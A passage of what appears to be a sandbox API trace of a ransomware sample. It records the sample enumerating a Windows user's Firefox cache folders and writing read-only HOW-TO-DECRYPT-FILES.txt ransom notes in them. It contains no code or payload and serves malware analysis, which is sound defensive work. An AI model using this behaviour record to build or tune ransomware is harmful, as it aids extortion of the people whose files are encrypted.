lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\_CACHE_001_", lpFilePart=0x0) returned 0x5a [0049.225] GetLastError () returned 0x12 [0049.225] SetErrorMode (uMode=0x1) returned 0x0 [0049.226] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\_CACHE_001_" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\_cache_001_"), fInfoLevelId=0x0, lpFileInformation=0x1c61300 | out: lpFileInformation=0x1c61300*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86c139a0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x86c139a0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xe9f76650, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x400000)) returned 1 [0049.227] GetLastError () returned 0x12 [0049.227] SetErrorMode (uMode=0x0) returned 0x1 [0049.227] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x67 [0049.227] GetLastError () returned 0x12 [0049.227] SetErrorMode (uMode=0x1) returned 0x0 [0049.227] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.227] GetLastError () returned 0x0 [0049.227] GetFileType (hFile=0x184) returned 0x1 [0049.227] SetErrorMode (uMode=0x0) returned 0x1 [0049.227] GetFileType (hFile=0x184) returned 0x1 [0049.227] WriteFile (in: hFile=0x184, lpBuffer=0x1c7cdd8*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18eb10, lpOverlapped=0x0 | out: lpBuffer=0x1c7cdd8*, lpNumberOfBytesWritten=0x18eb10*=0x18da, lpOverlapped=0x0) returned 1 [0049.228] GetLastError () returned 0x0 [0049.228] CloseHandle (hObject=0x184) returned 1 [0049.228] GetLastError () returned 0x0 [0049.228] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x67 [0049.228] GetLastError () returned 0x0 [0049.228] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.229] GetLastError () returned 0x0 [0049.229] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\_CACHE_002_", nBufferLength=0x105, lpBuffer=0x18e704, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\_CACHE_002_", lpFilePart=0x0) returned 0x5a [0049.229] GetLastError () returned 0x0 [0049.229] SetErrorMode (uMode=0x1) returned 0x0 [0049.229] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\_CACHE_002_" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\_cache_002_"), fInfoLevelId=0x0, lpFileInformation=0x1c7eb24 | out: lpFileInformation=0x1c7eb24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86c139a0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x86c139a0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xea00ebd0, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x400000)) returned 1 [0049.229] GetLastError () returned 0x0 [0049.229] SetErrorMode (uMode=0x0) returned 0x1 [0049.229] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x67 [0049.229] GetLastError () returned 0x0 [0049.229] SetErrorMode (uMode=0x1) returned 0x0 [0049.229] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0049.229] GetLastError () returned 0x5 [0049.230] SetErrorMode (uMode=0x0) returned 0x1 [0049.230] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\_CACHE_003_", nBufferLength=0x105, lpBuffer=0x18e704, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\_CACHE_003_", lpFilePart=0x0) returned 0x5a [0049.230] GetLastError () returned 0x5 [0049.230] SetErrorMode (uMode=0x1) returned 0x0 [0049.230] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\_CACHE_003_" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\_cache_003_"), fInfoLevelId=0x0, lpFileInformation=0x1c9c8a0 | out: lpFileInformation=0x1c9c8a0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86c139a0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x86c139a0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xd16fd400, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x400000)) returned 1 [0049.230] GetLastError () returned 0x5 [0049.230] SetErrorMode (uMode=0x0) returned 0x1 [0049.230] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x67 [0049.230] GetLastError () returned 0x5 [0049.230] SetErrorMode (uMode=0x1) returned 0x0 [0049.231] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0049.231] GetLastError () returned 0x5 [0049.231] SetErrorMode (uMode=0x0) returned 0x1 [0049.231] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\_CACHE_MAP_", nBufferLength=0x105, lpBuffer=0x18e704, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\_CACHE_MAP_", lpFilePart=0x0) returned 0x5a [0049.231] GetLastError () returned 0x5 [0049.231] SetErrorMode (uMode=0x1) returned 0x0 [0049.231] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\_CACHE_MAP_" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\_cache_map_"), fInfoLevelId=0x0, lpFileInformation=0x1cba61c | out: lpFileInformation=0x1cba61c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86c139a0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x86c139a0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xea080ff0, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x2114)) returned 1 [0049.232] GetLastError () returned 0x5 [0049.232] SetErrorMode (uMode=0x0) returned 0x1 [0049.232] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x67 [0049.232] GetLastError () returned 0x5 [0049.232] SetErrorMode (uMode=0x1) returned 0x0 [0049.232] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0049.232] GetLastError () returned 0x5 [0049.233] SetErrorMode (uMode=0x0) returned 0x1 [0049.233] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0", nBufferLength=0x105, lpBuffer=0x18e70c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0", lpFilePart=0x0) returned 0x50 [0049.233] GetLastError () returned 0x5 [0049.233] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.233] GetLastError () returned 0x5 [0049.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.233] GetLastError () returned 0x5 [0049.233] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0", lpFilePart=0x0) returned 0x50 [0049.233] GetLastError () returned 0x5 [0049.233] SetErrorMode (uMode=0x1) returned 0x0 [0049.233] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.233] GetLastError () returned 0x5 [0049.233] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.233] GetLastError () returned 0x5 [0049.233] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.234] GetLastError () returned 0x5 [0049.234] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.234] GetLastError () returned 0x5 [0049.234] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.234] GetLastError () returned 0x5 [0049.234] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.234] GetLastError () returned 0x5 [0049.234] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.234] GetLastError () returned 0x5 [0049.234] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.234] GetLastError () returned 0x12 [0049.234] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.234] SetErrorMode (uMode=0x0) returned 0x1 [0049.234] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0", lpFilePart=0x0) returned 0x50 [0049.234] GetLastError () returned 0x12 [0049.234] SetErrorMode (uMode=0x1) returned 0x0 [0049.234] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.234] GetLastError () returned 0x12 [0049.234] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.234] GetLastError () returned 0x12 [0049.234] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.234] GetLastError () returned 0x12 [0049.234] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.234] GetLastError () returned 0x12 [0049.234] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.234] GetLastError () returned 0x12 [0049.234] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.234] GetLastError () returned 0x12 [0049.234] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.234] GetLastError () returned 0x12 [0049.234] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.234] GetLastError () returned 0x12 [0049.234] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.234] SetErrorMode (uMode=0x0) returned 0x1 [0049.234] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\2B", nBufferLength=0x105, lpBuffer=0x18e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\2B", lpFilePart=0x0) returned 0x53 [0049.234] GetLastError () returned 0x12 [0049.234] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.234] GetLastError () returned 0x12 [0049.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.235] GetLastError () returned 0x12 [0049.235] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\2B", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\2B", lpFilePart=0x0) returned 0x53 [0049.235] GetLastError () returned 0x12 [0049.235] SetErrorMode (uMode=0x1) returned 0x0 [0049.235] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\2B\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.235] GetLastError () returned 0x12 [0049.235] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.235] GetLastError () returned 0x12 [0049.235] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.235] GetLastError () returned 0x12 [0049.235] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.235] GetLastError () returned 0x12 [0049.235] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.235] SetErrorMode (uMode=0x0) returned 0x1 [0049.235] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\2B", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\2B", lpFilePart=0x0) returned 0x53 [0049.235] GetLastError () returned 0x12 [0049.235] SetErrorMode (uMode=0x1) returned 0x0 [0049.235] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\2B\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.236] GetLastError () returned 0x12 [0049.236] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.236] GetLastError () returned 0x12 [0049.236] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.236] GetLastError () returned 0x12 [0049.236] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.236] GetLastError () returned 0x12 [0049.236] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.236] SetErrorMode (uMode=0x0) returned 0x1 [0049.236] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\2B\\0EAD3d01", nBufferLength=0x105, lpBuffer=0x18e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\2B\\0EAD3d01", lpFilePart=0x0) returned 0x5c [0049.236] GetLastError () returned 0x12 [0049.236] SetErrorMode (uMode=0x1) returned 0x0 [0049.236] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\2B\\0EAD3d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\0\\2b\\0ead3d01"), fInfoLevelId=0x0, lpFileInformation=0x1cdb85c | out: lpFileInformation=0x1cdb85c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc4d5f4b0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc4d5f4b0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc4d85610, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x6bca)) returned 1 [0049.236] GetLastError () returned 0x12 [0049.236] SetErrorMode (uMode=0x0) returned 0x1 [0049.236] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\2B\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\2B\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.236] GetLastError () returned 0x12 [0049.236] SetErrorMode (uMode=0x1) returned 0x0 [0049.236] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\2B\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\0\\2b\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.237] GetLastError () returned 0x0 [0049.237] GetFileType (hFile=0x184) returned 0x1 [0049.237] SetErrorMode (uMode=0x0) returned 0x1 [0049.237] GetFileType (hFile=0x184) returned 0x1 [0049.237] WriteFile (in: hFile=0x184, lpBuffer=0x1cf733c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1cf733c*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.238] GetLastError () returned 0x0 [0049.238] CloseHandle (hObject=0x184) returned 1 [0049.238] GetLastError () returned 0x0 [0049.238] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\2B\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\2B\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.238] GetLastError () returned 0x0 [0049.238] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\2B\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.238] GetLastError () returned 0x0 [0049.238] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\98", nBufferLength=0x105, lpBuffer=0x18e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\98", lpFilePart=0x0) returned 0x53 [0049.238] GetLastError () returned 0x0 [0049.238] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.238] GetLastError () returned 0x0 [0049.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.238] GetLastError () returned 0x0 [0049.238] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\98", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\98", lpFilePart=0x0) returned 0x53 [0049.238] GetLastError () returned 0x0 [0049.238] SetErrorMode (uMode=0x1) returned 0x0 [0049.238] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\98\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.239] GetLastError () returned 0x0 [0049.239] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.239] GetLastError () returned 0x0 [0049.239] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.239] GetLastError () returned 0x0 [0049.239] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.239] GetLastError () returned 0x12 [0049.239] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.239] SetErrorMode (uMode=0x0) returned 0x1 [0049.239] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\98", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\98", lpFilePart=0x0) returned 0x53 [0049.239] GetLastError () returned 0x12 [0049.239] SetErrorMode (uMode=0x1) returned 0x0 [0049.239] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\98\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.239] GetLastError () returned 0x12 [0049.239] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.239] GetLastError () returned 0x12 [0049.239] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.239] GetLastError () returned 0x12 [0049.239] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.239] GetLastError () returned 0x12 [0049.239] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.239] SetErrorMode (uMode=0x0) returned 0x1 [0049.239] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\98\\B60F3d01", nBufferLength=0x105, lpBuffer=0x18e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\98\\B60F3d01", lpFilePart=0x0) returned 0x5c [0049.239] GetLastError () returned 0x12 [0049.239] SetErrorMode (uMode=0x1) returned 0x0 [0049.239] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\0\\98\\B60F3d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\0\\98\\b60f3d01"), fInfoLevelId=0x0, lpFileInformation=0x1cfa92c | out: lpFileInformation=0x1cfa92c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x88f2fe20, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x88f2fe20, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x88fc83a0, 